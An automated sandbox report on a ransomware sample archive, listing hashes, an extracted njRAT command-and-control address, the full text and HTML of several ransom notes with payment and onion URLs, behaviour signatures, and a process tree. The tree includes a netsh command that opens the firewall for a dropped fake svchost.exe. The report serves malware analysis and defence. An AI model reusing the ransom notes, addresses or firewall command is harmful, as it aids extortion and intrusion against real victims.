Analysis

  • max time kernel
    253s
  • max time network
    256s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 17:38

General

  • Target

    RNSM00293.7z

  • Size

    6.0MB

  • MD5

    7f2848772a398030c54e1c38f33e55b1

  • SHA1

    f152362c1c62144106f62b26baaacde7b893d99a

  • SHA256

    950e37343e3deb0b86b27ff5e0aac2690afe3fcf6cf1405d7660a9398b195222

  • SHA512

    5bcaa1e9ae707203e42300a393339ca00b1c87af3e77d4b1d9a4174c7132500d50e15ea228093d5ecea878f6c540a4fab17fa4469e9f8c92226e0c100dea562c

  • SSDEEP

    98304:Y1SMscnIGxA06I6+hk7UtlZhJMOCv0zqUSSPBLUOrovx70WrKKMixdclkKlOQd1:YjsPGxj6mlTJnhGyUOrAB0KMixdnad1

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\how_recover+uky.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server. What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BTC NOW, and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://gecndhstrnsdf.gpay4it.com/2743F4EE3A36CA3E 2. http://hrfdknrmsfw.pestresdfasd.com/2743F4EE3A36CA3E 3. http://hrfdknrmsfw.pestresdfasd.com/2743F4EE3A36CA3E 4. https://t7r67vsrpjcm5dfc.onion.to/2743F4EE3A36CA3E 5. https://t7r67vsrpjcm5dfc.tor2web.org/2743F4EE3A36CA3E 6. https://t7r67vsrpjcm5dfc.onion.cab/2743F4EE3A36CA3E If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization. 3. Type in the address bar: t7r67vsrpjcm5dfc.onion/2743F4EE3A36CA3E 4. Follow the instructions on the site. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! !!! IMPORTANT INFORMATION: !!! Your personal pages: http://gecndhstrnsdf.gpay4it.com/2743F4EE3A36CA3E http://hrfdknrmsfw.pestresdfasd.com/2743F4EE3A36CA3E http://hrfdknrmsfw.pestresdfasd.com/2743F4EE3A36CA3E https://t7r67vsrpjcm5dfc.onion.to/2743F4EE3A36CA3E !!! Your personal TOR-Browser page: t7r67vsrpjcm5dfc.onion/2743F4EE3A36CA3E !!! Your personal identification ID (if you open the site directly): 2743F4EE3A36CA3E __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!
URLs

http://gecndhstrnsdf.gpay4it.com/2743F4EE3A36CA3E

http://hrfdknrmsfw.pestresdfasd.com/2743F4EE3A36CA3E

https://t7r67vsrpjcm5dfc.onion.to/2743F4EE3A36CA3E

https://t7r67vsrpjcm5dfc.tor2web.org/2743F4EE3A36CA3E

https://t7r67vsrpjcm5dfc.onion.cab/2743F4EE3A36CA3E

http://t7r67vsrpjcm5dfc.onion/2743F4EE3A36CA3E

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

C2

abdelkawii.zapto.org:5555

Mutex

f497dfd998155558ed591c65cb1136d5

Attributes
  • reg_key

    f497dfd998155558ed591c65cb1136d5

  • splitter

    |'|'|

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+wpvuf.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://ytrest84y5i456hghadefdsd.pontogrot.com/FD8BDF412DD53D77 2. http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/FD8BDF412DD53D77 3. http://5rport45vcdef345adfkksawe.bematvocal.at/FD8BDF412DD53D77 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/FD8BDF412DD53D77 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://ytrest84y5i456hghadefdsd.pontogrot.com/FD8BDF412DD53D77 http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/FD8BDF412DD53D77 http://5rport45vcdef345adfkksawe.bematvocal.at/FD8BDF412DD53D77 *-*-* Your personal page Tor-Browser: fwgrhsao3aoml7ej.ONION/FD8BDF412DD53D77 *-*-* Your personal identification ID: FD8BDF412DD53D77
URLs

http://ytrest84y5i456hghadefdsd.pontogrot.com/FD8BDF412DD53D77

http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/FD8BDF412DD53D77

http://5rport45vcdef345adfkksawe.bematvocal.at/FD8BDF412DD53D77

http://fwgrhsao3aoml7ej.onion/FD8BDF412DD53D77

http://fwgrhsao3aoml7ej.ONION/FD8BDF412DD53D77

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+cvhwj.txt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA4096 More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA4096 Key , both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1 - http://t54ndnku456ngkwsudqer.wallymac.com/BBFFDAB5759CF8DF 2 - http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/BBFFDAB5759CF8DF 3 - http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/BBFFDAB5759CF8DF If for some reasons the addresses are not available, follow these steps: 1 - Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2 - After a successful installation, run the browser 3 - Type in the address bar: xlowfznrg4wf7dli.onion/BBFFDAB5759CF8DF 4 - Follow the instructions on the site IMPORTANT INFORMATION Your personal pages http://t54ndnku456ngkwsudqer.wallymac.com/BBFFDAB5759CF8DF http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/BBFFDAB5759CF8DF http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/BBFFDAB5759CF8DF Your personal page Tor-Browser xlowfznrg4wf7dli.ONION/BBFFDAB5759CF8DF
URLs

http://t54ndnku456ngkwsudqer.wallymac.com/BBFFDAB5759CF8DF

http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/BBFFDAB5759CF8DF

http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/BBFFDAB5759CF8DF

http://xlowfznrg4wf7dli.onion/BBFFDAB5759CF8DF

http://xlowfznrg4wf7dli.ONION/BBFFDAB5759CF8DF

Extracted

Path

C:\Users\Public\Videos\# DECRYPT MY FILES #.txt

Family

cerber

Ransom Note
C E R B E R R A N S O M W A R E ######################################################################### Cannot you find the files you need? Is the content of the files that you looked for not readable? It is normal because the files' names, as well as the data in your files have been encrypted. Great!!! You have turned to be a part of a big community #Cerber_Ransomware. ######################################################################### !!! If you are reading this message it means the software !!! "Cerber Ransomware" has been removed from your computer. ######################################################################### What is encryption? ------------------- Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users. To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key. But not only it. It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data. ######################################################################### Everything is clear for me but what should I do? ------------------------------------------------ The first step is reading these instructions to the end. Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions. It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them. !!! Any attempts to get back your files with the third-party tools can !!! be fatal for your encrypted files. The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files. When you make a puzzle but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files. ######################################################################### !!! There are several plain steps to restore your files but if you do !!! not follow them we will not be able to help you, and we will not try !!! since you have read this warning already. ######################################################################### For your information the software to decrypt your files (as well as the private key provided together) are paid products. After purchase of the software package you will be able to: 1. decrypt all your files; 2. work with your documents; 3. view your photos and other media; 4. continue your usual and comfortable work at the computer. If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files. ######################################################################### There is a list of temporary addresses to go on your personal page below: _______________________________________________________________________ | | 1. http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3 | | 2. http://cerberhhyed5frqa.xo59ok.win/477C-90BF-775B-0291-25B3 | | 3. http://cerberhhyed5frqa.zx34jk.win/477C-90BF-775B-0291-25B3 | | 4. http://cerberhhyed5frqa.rt4e34.win/477C-90BF-775B-0291-25B3 | | 5. http://cerberhhyed5frqa.as13fd.win/477C-90BF-775B-0291-25B3 |_______________________________________________________________________ ######################################################################### What should you do with these addresses? ---------------------------------------- If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it): 1. take a look at the first address (in this case it is http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3); 2. select it with the mouse cursor holding the left mouse button and moving the cursor to the right; 3. release the left mouse button and press the right one; 4. select "Copy" in the appeared menu; 5. run your Internet browser (if you do not know what it is run the Internet Explorer); 6. move the mouse cursor to the address bar of the browser (this is the place where the site address is written); 7. click the right mouse button in the field where the site address is written; 8. select the button "Insert" in the appeared menu; 9. then you will see the address http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3 appeared there; 10. press ENTER; 11. the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling. If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions. If you browse the instructions in HTML format: 1. click the left mouse button on the first address (in this case it is http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3); 2. in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address. If for some reason the site cannot be opened check the connection to the Internet. ######################################################################### Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products. Unlike them we are ready to help you always. If you need our help but the temporary sites are not available: 1. run your Internet browser (if you do not know what it is run the Internet Explorer); 2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER; 3. wait for the site loading; 4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed; 5. run Tor Browser; 6. connect with the button "Connect" (if you use the English version); 7. a normal Internet browser window will be opened after the initialization; 8. type or copy the address ________________________________________________________ | | | http://cerberhhyed5frqa.onion/477C-90BF-775B-0291-25B3 | |________________________________________________________| in this browser address bar; 9. press ENTER; 10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again. If you have any problems during installation or operation of Tor Browser, please, visit https://www.youtube.com/ and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation. If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files. ######################################################################### Additional information: You will find the instructions for restoring your files in those folders where you have your encrypted files only. The instructions are made in two file formats - HTML and TXT for your convenience. Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files. The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company. ######################################################################### Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data. The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection. Together we make the Internet a better and safer place. ######################################################################### If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support. ######################################################################### Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.
URLs

http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3

http://cerberhhyed5frqa.xo59ok.win/477C-90BF-775B-0291-25B3

http://cerberhhyed5frqa.zx34jk.win/477C-90BF-775B-0291-25B3

http://cerberhhyed5frqa.rt4e34.win/477C-90BF-775B-0291-25B3

http://cerberhhyed5frqa.as13fd.win/477C-90BF-775B-0291-25B3

http://cerberhhyed5frqa.onion/477C-90BF-775B-0291-25B3

Extracted

Path

C:\Users\Public\Favorites\# DECRYPT MY FILES #.html

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>&#067;erber Ransomware</title> <style> a { color: #47c; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #333; font-family: "Helvetica Neue", Helvetica, "Segoe UI", Arial, freesans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; line-height: 1.6; margin: 0; padding: 0; } hr { background-color: #e7e7e7; border: 0 none; border-bottom: 1px solid #c7c7c7; height: 5px; margin: 30px 0; } li { padding: 0 0 7px 7px; } ol { padding-left: 3em; } .container { background-color: #fff; border: 1px solid #c7c7c7; margin: 40px; padding: 40px 40px 20px 40px; } .info, .tor { background-color: #efe; border: 1px solid #bda; display: block; padding: 0px 20px; } .logo { font-size: 12px; font-weight: bold; line-height: 1; margin: 0; } .tor { padding: 10px 0; text-align: center; } .warning { background-color: #f5e7e7; border: 1px solid #ebccd1; color: #a44; display: block; padding: 15px 10px; text-align: center; } </style> </head> <body> <div class="container"> <h3>C E R B E R&nbsp;&nbsp;&nbsp;R A N S O M W A R E</h3> <hr> <p>Cannot you find the files you need?<br>Is the content of the files that you looked for not readable?</p> <p>It is normal because the files' names, as well as the data in your files have been encrypted.</p> <p>Great!!!<br>You have turned to be a part of a big community #Cerber_Ransomware.</p> <hr> <p><span class="warning">If you are reading this message it means the software "Cerber Ransomware" has been removed from your computer.</span></p> <hr> <h3>What is encryption?</h3> <p>Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users.</p> <p>To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key.</p> <p>But not only it.</p> <p>It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data.</p> <hr> <h3>Everything is clear for me but what should I do?</h3> <p>The first step is reading these instructions to the end.</p> <p>Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you.</p> <p>After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions.</p> <p>It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.</p> <p><span class="warning">Any attempts to get back your files with the third-party tools can be fatal for your encrypted files.</span></p> <p>The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files.</p> <p>Finally it will be impossible to decrypt your files.</p> <p>When you make a puzzle but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly.</p> <p>You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files.</p> <hr> <p><span class="warning">There are several plain steps to restore your files but if you do not follow them we will not be able to help you, and we will not try since you have read this warning already.</span></p> <hr> <p>For your information the software to decrypt your files (as well as the private key provided together) are paid products.</p> <p>After purchase of the software package you will be able to:</p> <ol> <li>decrypt all your files;</li> <li>work with your documents;</li> <li>view your photos and other media;</li> <li>continue your usual and comfortable work at the computer.</li> </ol> <p>If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files.</p> <hr> <div class="info"> <p>There is a list of temporary addresses to go on your personal page below:</p> <ol> <li><a href="http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3" target="_blank">http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3</a></li> <li><a href="http://cerberhhyed5frqa.xo59ok.win/477C-90BF-775B-0291-25B3" target="_blank">http://cerberhhyed5frqa.xo59ok.win/477C-90BF-775B-0291-25B3</a></li> <li><a href="http://cerberhhyed5frqa.zx34jk.win/477C-90BF-775B-0291-25B3" target="_blank">http://cerberhhyed5frqa.zx34jk.win/477C-90BF-775B-0291-25B3</a></li> <li><a href="http://cerberhhyed5frqa.rt4e34.win/477C-90BF-775B-0291-25B3" target="_blank">http://cerberhhyed5frqa.rt4e34.win/477C-90BF-775B-0291-25B3</a></li> <li><a href="http://cerberhhyed5frqa.as13fd.win/477C-90BF-775B-0291-25B3" target="_blank">http://cerberhhyed5frqa.as13fd.win/477C-90BF-775B-0291-25B3</a></li> </ol> </div> <hr> <h3>What should you do with these addresses?</h3> <p>If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it):</p> <ol> <li>take a look at the first address (in this case it is <a href="http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3" target="_blank">http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3</a>);</li> <li>select it with the mouse cursor holding the left mouse button and moving the cursor to the right;</li> <li>release the left mouse button and press the right one;</li> <li>select "Copy" in the appeared menu;</li> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>move the mouse cursor to the address bar of the browser (this is the place where the site address is written);</li> <li>click the right mouse button in the field where the site address is written;</li> <li>select the button "Insert" in the appeared menu;</li> <li>then you will see the address <a href="http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3" target="_blank">http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3</a> appeared there;</li> <li>press ENTER;</li> <li>the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions.</p> <p>If you browse the instructions in HTML format:</p> <ol> <li>click the left mouse button on the first address (in this case it is <a href="http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3" target="_blank">http://cerberhhyed5frqa.6oifgr.win/477C-90BF-775B-0291-25B3</a>);</li> <li>in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet.</p> <hr> <p>Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products.</p> <p>Unlike them we are ready to help you always.</p> <p>If you need our help but the temporary sites are not available:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <span class="tor">http://cerberhhyed5frqa.onion/477C-90BF-775B-0291-25B3</span> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or operation of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=install+tor+browser+windows" target="_blank">https://www.youtube.com/</a> and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation.</p> <p>If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files.</p> <hr> <h3>Additional information:</h3> <p>You will find the instructions for restoring your files in those folders where you have your encrypted files only.</p> <p>The instructions are made in two file formats - HTML and TXT for your convenience.</p> <p>Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files.</p> <p>The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company.</p> <hr> <p>Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data.</p> <p>The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection.</p> <p>Together we make the Internet a better and safer place.</p> <hr> <p>If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support.</p> <hr> <p>Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.</p> </div> </body> </html>

Signatures

  • Cerber 9 IoCs

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • Cerber family
  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Gozi family
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modiloader family
  • Njrat family
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Contacts a large (17698) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 4 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 8 IoCs
  • Renames multiple (406) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Adds policy Run key to start application 2 TTPs 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 24 IoCs
  • Executes dropped EXE 58 IoCs
  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 16 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 39 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 2 IoCs
  • Interacts with shadow copies 3 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies Control Panel 6 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 47 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 22 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1124
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1176
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of UnmapMainImage
    PID:1224
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00293.7z"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2380
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2584
      • C:\Users\Admin\Desktop\00293\HEUR-Trojan-Ransom.Win32.Generic-8e7453b2dc89419360e245b6d2891af9bc94d254340cd254a0cfe0121ead30e1.exe
        HEUR-Trojan-Ransom.Win32.Generic-8e7453b2dc89419360e245b6d2891af9bc94d254340cd254a0cfe0121ead30e1.exe
        3⤵
        • Executes dropped EXE
        PID:676
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
          dw20.exe -x -s 388
          4⤵
            PID:1844
        • C:\Users\Admin\Desktop\00293\HEUR-Trojan-Ransom.Win32.Generic-ce4877859b83eef6a955045f1f474238b9c5df9ea991623e4373f4a728e98f78.exe
          HEUR-Trojan-Ransom.Win32.Generic-ce4877859b83eef6a955045f1f474238b9c5df9ea991623e4373f4a728e98f78.exe
          3⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          PID:1276
          • C:\Windows\svchost.exe
            "C:\Windows\svchost.exe"
            4⤵
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:220
            • C:\Windows\system32\netsh.exe
              netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
              5⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2648
